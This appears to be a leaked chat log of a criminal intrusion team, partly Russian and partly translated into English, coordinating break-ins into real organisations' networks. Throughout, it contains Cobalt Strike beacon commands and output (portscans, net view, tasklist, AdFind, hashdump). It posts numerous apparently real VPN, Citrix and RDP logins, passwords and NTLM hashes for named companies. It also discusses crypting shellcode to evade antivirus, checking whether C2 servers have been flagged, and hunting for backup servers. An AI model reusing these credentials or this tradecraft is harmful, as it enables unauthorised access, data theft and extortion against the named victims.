[read 8 bytes] (ICMP) Target '172.0.0.70' is alive. [read 8 bytes] (ICMP) Target '172.0.0.111' is alive. [read 8 bytes] [+] received output: (ICMP) Target '172.0.0.168' is alive. [read 8 bytes] (ICMP) Target '172.0.0.186' is alive. [read 8 bytes] (ICMP) Target '172.0.0.188' is alive. [read 8 bytes] (ICMP) Target '172.0.0.187' is alive. [read 8 bytes] [+] received output: (ICMP) Target '172.0.0.237' is alive. [read 8 bytes] [+] received output: 172.0.0.188:443 172.0.0.187:443 [+] received output: Scanner module is complete ``чек веб порты)где-то рядомну хоть что-то там есть`` beacon> portscan 172.0.0.1/24 445 icmp 1024 [*] Tasked beacon to scan ports 445 on 172.0.0.1/24 [+] host called home, sent: 93245 bytes [+] received output: (ICMP) Target '172.0.0.60' is alive. [read 8 bytes] [+] received output: (ICMP) Target '172.0.0.97' is alive. [read 8 bytes] (ICMP) Target '172.0.0.70' is alive. [read 8 bytes] (ICMP) Target '172.0.0.111' is alive. [read 8 bytes] [+] received output: (ICMP) Target '172.0.0.186' is alive. [read 8 bytes] (ICMP) Target '172.0.0.188' is alive. [read 8 bytes] (ICMP) Target '172.0.0.187' is alive. [read 8 bytes] (ICMP) Target '172.0.0.168' is alive. [read 8 bytes] [+] received output: (ICMP) Target '172.0.0.237' is alive. 
[read 8 bytes] [+] received output: Scanner module is complete ```:ok_hand:на 24 отсканьпо ДНС сабнетупоставь скан /16 от твоего ипестьесть ли ип на интерфейсепроверь через ipconfigда жив вродеон мог отвалитьсявпн жив?и пинг не проходит к тем ip что ip сканер выдал[ ](https://mediaeveryone.com/channel/general?msg=zhxKp8Y2oYYWBd72t) чет не получается никуда двинуться впн прокинут но в подсети 172.169.16.1-172.169.17.254 портскан ничего не даетвзял фаервол в си руки и заблокировала, окзаблочил рдп коннекта почему он его?касперский его прибилзавелся ваш дедик второйну вот он скорее всего и заблочил вход[ ](https://mediaeveryone.com/channel/general?msg=XNXcefd8b4k5Mz7n8) да, циткрикс не пускал без едр а виндеф было в падлу включать)создал[ ](https://mediaeveryone.com/channel/general?msg=4kBFYh2BFCPu3ruWM) есть сессияу вас каспер стоял на дедике что ли?ок щас руками пересниму[ ](https://mediaeveryone.com/channel/general?msg=iXam5Ja66xMDeu8gL) нет это текстовый былсразу отпиши полную ситуацию. ось, что сделал, что получилось, что ожидалось, в чем проблемаа щас снял тулчейномперед тем как меня выкинуло - я снимал рукамиесли - это архив?так а я не понял, ты его руками снял или через тулчейн?я еге не докачал - больше 200 метров файл был`` https://vlab.unf.edu/vpn/index.html N01447311 Commercial5207! ``` @user8 заменаиз тулчейна адф вернул 11 юзеров а без тулчейна сколько?может вполнес ним все в порядке? или может косячить?по тулчейну - он вернул в адфайнде 11 юзеров, а я качал файл 238 Мбвообще ничегоникаких шелов нет?[ ](https://mediaeveryone.com/channel/general?msg=t33YpDhLCbMWQiLaW) тут есть только одно приложение и эти креды ему не катятзалетай скорее, бери ад, бери доступы и пролезай в сетькто же так делает)крепить цитру....и запись о персисте из реестра пропалану я на свою кобу персист поставила откуда у тебя дл на закреп?эмми вобще все исчезло, даже dll на закрепда нету там ничегоесть ав или еще чет?страннов апдате у юзераа где ты их оставил?там странно.... 
я щас через цирту перезашел, заново сессию себе кинул, а никаких моих файлов там уже нет... как так? спали демоны?а, отличновернулсяя уже.а то он уже инфо забиралпустите кто-нибудь @user4 в сетьтак ну ладно, у вас сейчас 3 дедика естьи впн не отключается даже после ребутаскорее всего улетел дедик за впнзначит от порталас прошитым конфигом)ну перейдя по сылке он сам предложил скачатьот портала?установили откуда?там только цитру установили и всё, даже не настраивали еёвпн поставили?я и user 9 на нём работалидедик к которому не подключаетсяа это что?кто последний работал на 199.241.188.186?`` https://protransport.cloud.com/citrix/storeweb/ rtgroup2@proloads.com Blue4586 ``` @user8 заменакачал ad infosisd@user4 откуда?@user8 маякни в конфу меня что то сессии отвались(прогресс описал в конфе@user9 @user7 в работечем заняты еще 3 человека?а ты админ?ок, сейчас добавлю пользователю групумб спалили аномалию и убрали группу удаленного доступа`the connection was denied because the user account is not authorized for remote login` как понять не авторизован для входа ?у кого впн поднялся/есть доступ в сеть?не понял вопросакто еще?@user9 в работелсадмики каких-то сайтов.У меня одна, с цитрикса никуда не пойти впн включился на новом дедике - буду пробовать смотерть что есть в сети под впномтулчейн на тесты1сколько сетей в работе?`` FH*(UG&$*WFH&*efu ``Что делать далеето есть?Какой план?сейчас выдам тулчейнпонялты имешь ввиду цитрикс ресивер? просто я тоже как бы подключился но потом дедик улетел@user9 а у тебя в чем проблема? 
I connected to the VPN
win 2012
``` 206.221.176.24:37345 Administrator:V86Rk1Dd6Ck1yqThbD6Dh8Cg0Z8iLiiY ```
hot replacement
reported to the DC
about the dedik, yes
still unavailable
so did they fix the dedik yet?
analogues of run?
paloca.cernerworks.com
closed, tried via ehk
domain admin.sisd.k12
well, when the dedik starts working I'll try, or when colleagues free up I'll try
RDP?
same situation
I can't launch cmd and PowerShell, closed by the admin, can't upload a file.
which conference are you in?
then LPE and so on
ok))
in case you forgot: AD INFO, LA, DA, EA, DC
no, everything by the algorithm
well, I'm in the system, next as usual? or some other inputs?
didn't understand the question
we work the whole network, I mean dumping AD?
well, and for now the dedik is still unavailable
I'm logged in
nah, I just don't understand something there, everything in this link just leads to site admin panels
[ ](https://mediaeveryone.com/channel/general?msg=TPa6bFNG43pgJ65BY) are you logged in here? or did the user log in?
``` https://connect.mch1.org/vpn/index.html lpsmpep2 vk2Lazu4 ``` @user8 replacement
write in the conference
right here
@user8 where are we?
ok
maybe
they'll reboot it now, and pull it into Cobalt just in case
maybe it did go behind the VPN after all
same
but after launch I worked in it for another 10 minutes or so
Citrix plugin
you didn't happen to run a VPN on it?)
yeah, it works for a couple of minutes and then is unavailable for 15
looks like the dedik is completely dead (199.241.188.186)
``` https://mydesktop.sisd.net/vpn/index.html jeksae happiness3 ``` @user4 replacement
well, Citrix Receiver seems to tunnel something, otherwise no
entry into the network?
[ ](https://mediaeveryone.com/channel/general?msg=9uCLqBtxTJHonFyfv) the dedik keeps dropping, but I poked around there, everything leads to site admin panels
``` JE*SG&Y*FwEYHIf7g8we ```
+
yes
add more?
but the detection rate is higher there
there's an option of crypting the shellcode into an exe
only shellcode in a dll
nope?
@tl1 there's a job for crypting an exe
``` https://liveopsnation.okta.com/app/citrixnetscalergateway_saml/exk25j1wbvpyk8bfl2p7/sso/saml jgarcia693@aol.com Thebear#1 ``` @user9 replacement
@user3 replacement
``` https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj Colorblue76!
```
hand the dedik over to @user8 for now
apparently the account is logged in
and after that the account disappears from the common list
If you do it through the application, it returns ``` your changes could not be served due to an invalid configuration of the account PROD ```
calling the window with the application through it
hi)
Hi.
an ica file is a file that gets opened by citrix receiver
yep
you need to install Citrix Receiver, which will open that file
Wherever I click, it returns a file ``` [Encoding] InputEncoding=UTF8 [WFClient] ProxyFavorIEConnectionSetting=Yes ProxyTimeout=30000 ProxyType=Auto ProxyUseFQDN=Off RemoveICAFile=yes TransparentKeyPassthrough=Local TransportReconnectEnabled=Off Version=2 VirtualCOMPortEmulation=On [ApplicationServers] Report Request Maintenance Prod= [Report Request Maintenance Prod] Address=;40;STA664590668;2023A7A9232D60230A425A54DEFFA6 AutologonAllowed=ON BrowserProtocol=HTTPonTCP CGPSecurityTicket=On ClearPassword=53F80104235331 ClientAudio=On DesiredColor=8 DesiredHRES=0 DesiredVRES=0 Domain=\6AA387C7B8517C82 DoNotUseDefaultCSL=On EncryptionLevelSession=EncRC5-128 FontSmoothingType=0 HDXoverUDP=Off HTTPBrowserAddress=! InitialProgram=#Report Request Maintenance Prod Launcher=WI LaunchReference=558DD381B14D807B6BEEDE6BACFB10 LocHttpBrowserAddress=!
LogonTicket=53F801042353316AA387C7B8517C82 LogonTicketType=CTXS1 LongCommandLine= LPWD=156 NRWD=93 ProxyTimeout=30000 ProxyType=Auto SecureChannelProtocol=Detect SessionsharingKey=SHNGKRJyAVxk+e5emFlorzKJwYLVSQhb SFRAllowed=Off SSLCiphers=all SSLEnable=On SSLProxyHost=ag2.cernerworks.com:443 startSCD=1606819909507 Title=Report Request Maintenance Prod TransportDriver=TCP/IP TRWD=0 TWIMode=On WinStationDriver=ICA 3.0 [Compress] DriverNameWin16=pdcompw.dll DriverNameWin32=pdcompn.dll [EncRC5-0] DriverNameWin16=pdc0w.dll DriverNameWin32=pdc0n.dll [EncRC5-128] DriverNameWin16=pdc128w.dll DriverNameWin32=pdc128n.dll [EncRC5-40] DriverNameWin16=pdc40w.dll DriverNameWin32=pdc40n.dll [EncRC5-56] DriverNameWin16=pdc56w.dll DriverNameWin32=pdc56n.dll ```
all kerbs to @tl2 in DM
ah, ok)
or does medimizer belong to user4?
``` https://login.medimizer.net/rdweb/pages/en-us/login.aspx bill@biomedtechs.com 2003Proline ```
yes, I later changed the message to medimizer
there were just 2 accounts there
@user9 you took the access from @user4, his domain is `mysystems4pt.com`
`https://apps.oasispetroleum.com/vpn/index.html bmolinaro b5ab80fbd9E!`
[ ](https://mediaeveryone.com/channel/general?msg=gekDndf3GK77gi9qR) +
``` https://login.medimizer.net/rdweb/pages/en-us/login.aspx bill@biomedtechs.com 2003Proline ```
took https://paloca.cernerworks.com/citrix/prodweb/ dr14349773
``` https://portal.mysystems4pt.com/vpn/index.html PWilliams061 Signal061relent ```
creating a conference, adding you
divide them up and write who took what
the accesses are valid
5 of them
``` https://paloca.cernerworks.com/citrix/prodweb/ dr14349773 ```
``` https://citrix.sharecare.com/vpn/index.html ad.alex.whittier Ph@nt0m01Beatz87 ```
oh, and there will also be RDPs here
``` https://login.medimizer.net/rdweb/pages/en-us/login.aspx office@biomedtechs.com Bmt5510shoP https://login.medimizer.net/rdweb/pages/en-us/login.aspx bill@biomedtechs.com 2003Proline ```
``` https://portal.mysystems4pt.com/vpn/index.html PWilliams061 Signal061relent ```
``` https://apps.oasispetroleum.com/vpn/index.html bmolinaro
b5ab80fbd9E! ```
naturally
still remember how it's done?)
divide them up and get to work
you have 2 dediks for working with the VPNs + Citrix
in terms of scope of work, I'm giving you a list of Citrix + VPNs
okay, it'll stay in reserve for now
where
nah, just nobody needs it
relf
that's it, they've all disappeared
does anyone want another new Cobalt?
shellcode builder
``` spidfhoUSDFHI&SEUHFIjoaPS;ddsijghf ```
Cobalt in DM
mine
so, who still has an inactive one then?
they live long though)
whoever wants can take 1 clean one
so 4 working ones
well, it did log in
no, if it doesn't connect to the Cobalt, that means inactive
right?
then the Cobalt is inactive
if I have no active sessions
I didn't quite get it
so then
and exactly 2 of them have inactive ones
so 3 Cobalts are working
yep
the domain IP with brackets in Google
yes
into the query just as you wrote it, with brackets
23.106.160.86, no info
IP
did you check the domain IP or the Cobalt IP?)
so now we'll find out how many working Cobalts we have and distribute the current 2
mine seems clean
I have 2 clean Cobalts
if there's info that the IP is flagged as Cobalt, then that Cobalt gets torn down
into the search: 123[.]123[.]123
whether it has shown up as Cobalt Strike
those with an active Cobalt, check the domain IP in Google for detections
I'll hand out a fresh one
yes
Is there a crypter?
active
simvp.com
one person hasn't reported on their Cobalt)
the rest didn't have Cobalts?
``` likenic.com 104.243.40.126:38542 ``` not active
mine `85.150.190.113:61718` is active (it's one of the last ones that were handed out)
the rest?
mine is inactive ``` https://ezvol.com - 209.222.101.55:38350 ```
Sessions from the lab are coming in
the toolkit will be closer to 15:00, a fresh build, @tl2 will hand it out, so feedback on the work is expected from all of us
raills.com
active/not active
tell me your old Cobalts
what about the toolkit and the Cobalts, I mean do we work in the old ones or will there be new ones?
10 minutes for organizational questions and then straight to work
Well then, hello again everyone, it's been a while since we talked
now 5)
5)
only 4?
everyone's present
hi
We wait and begin)
Good afternoon
:space_invader:
hi
Good afternoon everyone
``` Windows IP Configuration Host Name . . . . . . . . . . . . : UKHECSLT3028 Primary Dns Suffix . . . . . . . : matches.com Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . 
: No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : matches.com Home Ethernet adapter Ethernet: Media State. . . . . . . . . . . : Media disconnected Connection-specific DNS suffix : Description . . . . . . . . . . . : Intel(R) Ethernet Connection (6) I219-V Physical Address. . . . . . . . . : E8-D8-D1-F3-F7-7E DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes Wireless LAN adapter Local Area Connection* 1: Media State. . . . . . . . . . . : Media disconnected Connection-specific DNS suffix : Description . . . . . . . . . . . : Microsoft Wi-Fi Direct Virtual Adapter Physical Address. . . . . . . . . : 60-F2-62-90-AE-62 DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes Wireless LAN adapter Local Area Connection* 2: Media State. . . . . . . . . . . : Media disconnected Connection-specific DNS suffix : Description . . . . . . . . . . . : Microsoft Wi-Fi Direct Virtual Adapter #2 Physical Address. . . . . . . . . : 62-F2-62-90-AE-61 DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes Ethernet adapter Ethernet 2: Media State. . . . . . . . . . . : Media disconnected Connection-specific DNS suffix : Description . . . . . . . . . . . : Fortinet Virtual Ethernet Adapter (NDIS 6.30) Physical Address. . . . . . . . . : 00-09-0F-FE-00-01 DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes Wireless LAN adapter WiFi: Connection-specific DNS Suffix : Description . . . . . . . . . . . : Intel(R) Wi-Fi 6 AX200 160MHz Physical Address. . . . . . . . . : 3E-5E-B9-EB-F9-F8 DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes IPv6 Address. . . . . . . . . . . : 2a02:c7f:d417:c000:fcae:695d:8216:8644(Preferred) IPv6 Address. . . . . . . . . . . : fda8:e756:3c36:0:fcae:695d:8216:8644(Preferred) Temporary IPv6 Address. . . . . . : 2a02:c7f:d417:c000:848b:70e:a51c:a5c3(Preferred) Temporary IPv6 Address. . . . . . 
: fda8:e756:3c36:0:6806:3a52:eadd:8175(Preferred) Link-local IPv6 Address . . . . . : fe80::fcae:695d:8216:8644%10(Preferred) IPv4 Address. . . . . . . . . . . : 192.168.0.16(Preferred) Subnet Mask . . . . . . . . . . . : 255.255.255.0 Lease Obtained. . . . . . . . . . : 21 September 2020 17:20:50 Lease Expires . . . . . . . . . . : 23 September 2020 13:55:43 Default Gateway . . . . . . . fe80::3e89:94ff:fe6e:1249%10 192.168.0.1 DHCP Server . . . . . . . . . . . : 192.168.0.1 DHCPv6 IAID . . . . . . . . . . : 174125666 DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-FB-F4-0B-E8-D8-D1-F3-F7-7E DNS Servers . . . . . . . . . . . : fda8:e756:3c36:0:3e89:94ff:fe6e:1248 NetBIOS over Tcpip. . . . . . . . : Enabled Ethernet adapter Bluetooth Network Connection: Media State. . . . . . . . . . . : Media disconnected Connection-specific DNS suffix : Description . . . . . . . . . . . : Bluetooth Device (Personal Area Network) Physical Address. . . . . . . . . : 60-F2-62-90-AE-65 DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes Tunnel adapter Teredo Tunneling Pseudo-Interface: Connection-specific DNS Suffix : Description . . . . . . . . . . . : Microsoft Teredo Tunneling Adapter Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Yes IPv6 Address. . . . . . . . . . . : 2001:0:2851:7ae4:2036:bad:a1f9:8e7c(Preferred) Link-local IPv6 Address . . . . . : fe80::2036:bad:a1f9:8e7c%11(Preferred) Default Gateway . . . . . . . . : NetBIOS over Tcpip. . . . . . . . : Disabled `````` (ARP) Target '192.168.0.16' is alive. 3E-5E-B9-EB-F9-F8 (ARP) Target '192.168.0.1' is alive. 3C-89-94-6E-12-49 (ARP) Target '192.168.0.26' is alive. BC-A5-11-97-4D-A1 (ARP) Target '192.168.0.12' is alive. (ARP) Target '192.168.0.3' is alive. (ARP) Target '192.168.0.23' is alive. 02(ARP) Target '192.168.0.2' is alive. AC(ARP) Target '192.168.0.4' is alive. (ARP) Target '192.168.0.8' is alive. 
(ARP) Target '192.168.0.6' is alive. B0-68-E6-1D-DC-8F (ARP) Target '192.168.0.18' is alive. F0-99-B6-26-91-33 (ARP) Target '192.168.0.9' is alive. 0C-B2-B7-1C-9C-9B (ARP) Target '192.168.0.7' is alive. 02-0F-B5-81-CD-E1 (ARP) Target '192.168.0.17' is alive. BC-92-6B-7A-D8-BF (ARP) Target '192.168.0.10' is alive. (ARP) Target '192.168.0.13' is alive. C098--3801--96A7--6492--6437--DC83 (ARP) Target '192.168.0.128' is alive. 02-0F-B5-0B-15-44 192.168.0.10:631 192.168.0.10:515 192.168.0.10:443 192.168.0.10:23 192.168.0.10:80 192.168.0.10:21 (220 FTP print service:V-1.13/Use the network password for the ID if updating.) 192.168.0.7:5000 192.168.0.7:53 192.168.0.7:80 192.168.0.8:80 192.168.0.16:5040 192.168.0.16:3389 192.168.0.16:999 192.168.0.16:443 192.168.0.1:5431 192.168.0.16:139 192.168.0.16:135 192.168.0.16:80 192.168.0.1:5300 192.168.0.1:443 192.168.0.1:80 192.168.0.1:53 192.168.0.16:445 (platform: 500 version: 10.0 name: UKHECSLT3028 domain: MATCHES) ```
apparently the VPN isn't connected
``` domain: UKHECSLT3028 Login: Administrator Password: 192837465S! NTLM: f490c4823837a7d002e0176f3c5203ad Domain: MATCHES Login: mercedesd Password: Dinham2323 NTLM: 7c839aa54221edb65e959f18ab9bde41 ```
`hashdump` ``` Administrator:500:aad3b435b51404eeaad3b435b51404ee:f490c4823837a7d002e0176f3c5203ad::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:1a20cb05b4b6db77e592dee4e974e4d9::: ```
AdFind dies under the local admin, and under other users it doesn't work at all
``` [*] Tasked beacon to run: C:\Users\Administrator\AdFind.exe -f "(objectcategory=person)" > ad_users.txt [+] host called home, sent: 108 bytes [+] received output: AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 LDAP_BIND: [] Error 0x51 (81) - Server Down Terminating program. 
```
``` beacon> shell net localgroup "Administrators" [*] Tasked beacon to run: net localgroup "Administrators" [+] host called home, sent: 62 bytes [+] received output: Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator MATCHES\domain admins MATCHES\sec_WorkstationLocalAdmin The command completed successfully. ```
for everyone
>operatingSystem: Windows Server 2012 R2 Standard
damn, I misread it
[ ](https://mediaeveryone.com/group/saiglobal-com?msg=k7PCBz9uHZfYGa3QG) yes, I took that from the description in ad_comp
``` beacon> shell tasklist /s 10.225.10.53 /v [*] Tasked beacon to run: tasklist /s 10.225.10.53 /v [+] host called home, sent: 58 bytes [+] received output: Image Name PID Session Name Session# Mem Usage User Name CPU Time ========================= ======== ================ =========== ============ ================================================== ============ System Idle Process 0 Services 0 4 K NT AUTHORITY\SYSTEM 830:25:19 System 4 Services 0 276 K N/A 0:40:04 smss.exe 236 Services 0 1,036 K NT AUTHORITY\SYSTEM 0:00:00 csrss.exe 332 Services 0 4,020 K NT AUTHORITY\SYSTEM 0:00:44 wininit.exe 388 Services 0 3,892 K NT AUTHORITY\SYSTEM 0:00:00 csrss.exe 396 Console 1 3,576 K NT AUTHORITY\SYSTEM 0:00:00 winlogon.exe 440 Console 1 5,904 K NT AUTHORITY\SYSTEM 0:00:00 services.exe 484 Services 0 10,748 K NT AUTHORITY\SYSTEM 1:35:33 lsass.exe 492 Services 0 17,544 K NT AUTHORITY\SYSTEM 0:06:05 svchost.exe 556 Services 0 11,484 K NT AUTHORITY\SYSTEM 0:01:11 svchost.exe 600 Services 0 9,812 K NT AUTHORITY\NETWORK SERVICE 0:12:19 LogonUI.exe 684 Console 1 24,144 K NT AUTHORITY\SYSTEM 0:00:00 MsMpEng.exe 696 Services 0 175,280 K NT AUTHORITY\SYSTEM 1:37:48 dwm.exe 704 Console 1 22,012 K Window Manager\DWM-1 0:00:00 svchost.exe 808 Services 0 17,876 K NT AUTHORITY\LOCAL SERVICE 0:14:12 svchost.exe 848 Services 0 15,752 K NT 
AUTHORITY\SYSTEM 0:00:37 svchost.exe 868 Services 0 61,204 K NT AUTHORITY\SYSTEM 2:42:51 svchost.exe 920 Services 0 14,020 K NT AUTHORITY\LOCAL SERVICE 0:00:26 svchost.exe 1000 Services 0 21,656 K NT AUTHORITY\NETWORK SERVICE 0:05:03 svchost.exe 584 Services 0 11,044 K NT AUTHORITY\LOCAL SERVICE 0:00:39 spoolsv.exe 1132 Services 0 13,264 K NT AUTHORITY\SYSTEM 0:00:11 svchost.exe 1168 Services 0 7,832 K NT AUTHORITY\SYSTEM 0:00:05 ir_agent.exe 1188 Services 0 13,808 K NT AUTHORITY\SYSTEM 0:01:04 conhost.exe 1300 Services 0 3,024 K NT AUTHORITY\SYSTEM 0:00:01 newrelic-infra.exe 1308 Services 0 26,188 K NT AUTHORITY\SYSTEM 5:46:01 ir_agent.exe 1324 Services 0 66,396 K NT AUTHORITY\SYSTEM 1:05:42 snmp.exe 1400 Services 0 6,988 K NT AUTHORITY\SYSTEM 0:02:56 svchost.exe 1416 Services 0 15,644 K NT AUTHORITY\SYSTEM 0:01:38 svchost.exe 1440 Services 0 13,916 K NT AUTHORITY\SYSTEM 0:00:39 vmtoolsd.exe 1472 Services 0 13,900 K NT AUTHORITY\SYSTEM 0:09:48 WmiApSrv.exe 1572 Services 0 8,292 K NT AUTHORITY\SYSTEM 0:01:02 wmi_exporter.exe 1656 Services 0 15,924 K NT AUTHORITY\SYSTEM 0:00:34 WmiPrvSE.exe 1764 Services 0 40,132 K NT AUTHORITY\SYSTEM 0:37:12 WmiPrvSE.exe 1784 Services 0 24,328 K NT AUTHORITY\NETWORK SERVICE 4:11:00 svchost.exe 1536 Services 0 67,976 K NT AUTHORITY\NETWORK SERVICE 0:01:17 svchost.exe 2156 Services 0 4,808 K NT AUTHORITY\NETWORK SERVICE 0:00:03 dllhost.exe 2300 Services 0 10,956 K NT AUTHORITY\SYSTEM 0:00:04 msdtc.exe 2496 Services 0 7,384 K NT AUTHORITY\NETWORK SERVICE 0:00:03 WmiPrvSE.exe 2820 Services 0 10,876 K NT AUTHORITY\LOCAL SERVICE 0:23:58 CcmExec.exe 3364 Services 0 118,580 K NT AUTHORITY\SYSTEM 0:12:01 WmiPrvSE.exe 3396 Services 0 26,704 K NT AUTHORITY\SYSTEM 0:00:36 WmiPrvSE.exe 3644 Services 0 30,296 K NT AUTHORITY\SYSTEM 0:18:55 WmiPrvSE.exe 3752 Services 0 10,024 K NT AUTHORITY\LOCAL SERVICE 0:02:27 WmiPrvSE.exe 552 Services 0 6,632 K NT AUTHORITY\LOCAL SERVICE 0:00:01 CmRcService.exe 2088 Services 0 8,784 K NT AUTHORITY\SYSTEM 
0:00:09 ir_agent.exe 3136 Services 0 100,072 K NT AUTHORITY\SYSTEM 0:43:25 ir_agent.exe 244 Services 0 63,524 K NT AUTHORITY\SYSTEM 0:25:59 ir_agent.exe 3260 Services 0 47,284 K NT AUTHORITY\SYSTEM 0:05:57 csrss.exe 2252 RDP-Tcp#0 2 14,128 K NT AUTHORITY\SYSTEM 0:00:00 winlogon.exe 1068 RDP-Tcp#0 2 5,292 K NT AUTHORITY\SYSTEM 0:00:00 dwm.exe 2216 RDP-Tcp#0 2 39,120 K Window Manager\DWM-2 0:00:04 taskhostex.exe 3388 RDP-Tcp#0 2 6,520 K DATACENTER\adm.cotral0 0:00:00 rdpclip.exe 2268 RDP-Tcp#0 2 6,908 K DATACENTER\adm.cotral0 0:00:00 explorer.exe 1716 RDP-Tcp#0 2 99,236 K DATACENTER\adm.cotral0 0:00:20 WmiPrvSE.exe 2068 Services 0 15,960 K NT AUTHORITY\SYSTEM 0:00:22 vmtoolsd.exe 2916 RDP-Tcp#0 2 12,688 K DATACENTER\adm.cotral0 0:03:14 msseces.exe 2116 RDP-Tcp#0 2 13,852 K DATACENTER\adm.cotral0 0:00:00 SCNotification.exe 1100 RDP-Tcp#0 2 40,204 K DATACENTER\adm.cotral0 0:00:06 xagt.exe 2064 Services 0 7,516 K NT AUTHORITY\SYSTEM 0:00:01 xagtnotif.exe 3276 RDP-Tcp#0 2 6,520 K DATACENTER\adm.cotral0 0:00:00 ir_agent.exe 1208 Services 0 51,040 K NT AUTHORITY\SYSTEM 0:00:06 ir_agent.exe 3624 Services 0 49,988 K NT AUTHORITY\SYSTEM 0:00:06 ```
what's written in operating system in AD for them?
UAT is hardly a NAS ))))
also look at the processes
ping -> shell dir \\223145483475843\C$ ?
``` Presumably NASes: >description: C360 Client Files USHDC1-CSPFPS03.datacenter.local USHDC1-CSPFPS12.datacenter.local USHDC1-CSPFPS08.datacenter.local USHDC1-CSPFPS02.datacenter.local USHDC1-CSPFPS04.datacenter.local USHDC1-CSPFPS14.datacenter.local USHDC1-CSPFPS13.datacenter.local USHDC1-CSPFPS10.datacenter.local USHDC1-CSPFPS01.datacenter.local USHDC1-CSPFPS09.datacenter.local USHDC1-CSPFPS11.datacenter.local USHDC1-CSPFPS06.datacenter.local USHDC1-CSPFPS05.datacenter.local USHDC1-CSPFPS07.datacenter.local >description: C360 UAT File Servers USHDC1-CSQFPS01.datacenter.local USHDC1-CSQFPS02.datacenter.local ```
14 client ones, 2 UAT
all SSO
no need even to pull them in
pull them in and poke around there?
and are they all FS?
look around
[ ](https://mediaeveryone.com/group/saiglobal-com?msg=6LW23aHAC5BNgtnSZ) you mean what I sent above?
you can also look over the file servers
if there's nothing in this domain for backup yet, we look for virtualization)
well, I'm sort of working through datacenter
is there really nothing in the other domains either?
``` user 2-2[AUHDC1-COPADS01]SYSTEM */5008|2020Oct08 02:29:22> net view [*] Tasked beacon to run net view [+] host called home, sent: 104504 bytes [+] received output: List of hosts: Server Name IP Address Platform Version Type Comment ----------- ---------- -------- ------- ---- ------- APP01 10.195.25.144 500 5.2 PDC [+] received output: APP02 10.195.25.147 500 5.2 AUHDC1-COPADS01 10.195.25.50 500 6.3 PDC AUHDC1-COPADS02 10.195.25.49 500 6.3 BDC AUHDC1-COPADS04 10.195.25.35 500 6.3 BDC AUHDC1-COPADS05 10.195.25.43 500 10.0 BDC AUHDC1-COPAPP08 10.195.25.20 500 6.3 AUHDC1-COPFPS01 10.195.25.115 500 6.3 AUHDC1-COPFPS02 10.195.25.3 500 6.3 AUHDC1-COPFPS03 10.195.25.54 500 10.0 AUHDC1-COPSCM01 10.195.25.210 500 6.3 AUHDC1-COPSCM02 10.195.25.211 500 6.3 AUHDC1-COPSCM04 10.195.25.218 500 6.3 AUHDC1-COPSQL01 10.195.25.212 500 6.3 AUHDC1-COPSQL02 10.195.25.213 500 6.3 AUHDC1-COPSQL11 10.195.25.125 500 6.3 AUHDC1-COQSQL06 10.195.25.36 500 6.3 AUSYDE95X-SON2 10.195.25.184 500 6.0 AUSYDHC-APP006 10.195.25.84 500 4.0 AUSYDHC-APP016 10.195.25.76 500 5.2 AUSYDHC-APP025 10.195.25.175 500 5.2 AUSYDHC-APP027 10.195.25.94 500 6.0 AUSYDHC-COPMG05 10.195.25.242 500 6.1 AUSYDHC-CS-APP1 10.195.25.114 500 5.2 AUSYDHC-CS-MOS1 10.195.25.63 500 5.2 AUSYDHC-CSPSQ01 10.195.25.214 500 6.1 AUSYDHC-EPPCON1 10.195.25.235 500 6.0 AUSYDHC-EPPPS1 10.195.25.52 500 10.0 AUSYDHC-EPPREP1 10.195.25.225 500 6.0 AUSYDHC-EPPREP2 10.195.25.226 500 6.0 AUSYDHC-EPPSON1 10.195.25.238 500 6.0 AUSYDHC-LDS1 10.195.25.62 500 6.0 AUSYDHC-SQL16 10.195.25.178 500 6.1 AUSYDHQ-FS1 10.195.25.3 500 6.3 AUSYDHQ-FS1TEST 10.195.25.3 500 6.3 ```
>description: C360 UAT File Servers
>description: C360 Client Files
won't net view work?
no NAS, Backup, Veeam
yep
veeam - Veeam?
are there no keywords in the hostnames pointing to NAS, backup, Veeam, etc.?
and how to pick them out?
why?
then portscan 21 22?
they could be Windows-based
if there are no Linuxes in ad_comp, then there are no NASes either? :thinking:
but I think at least 2-3 more can be opened
i.e. there won't be 100% coverage and some domains won't be visible from anywhere
each domain can see a part of the trusts that weren't visible initially
you had 19 in the overall list initially
uh-huh
datacenter.local ``` 0: SAIG saig.frd.global (Direct Outbound) (Direct Inbound) 1: FRD frd.global (Direct Outbound) (Direct Inbound) 2: DATACENTER datacenter.local (Forest tree root) (Primary Domain) (Native) ```
also dump from the current one, where @user8 is
`saig.frd.global`
the ones that are in AD
in this saiglobal.com it had 2 datacenters in its trusts
[ ](https://mediaeveryone.com/group/saiglobal-com?msg=t7mimJ5JXQBP2Qbrf) please label which domain it's from
so one domain sees a part of the trusts from the overall list that the others don't see
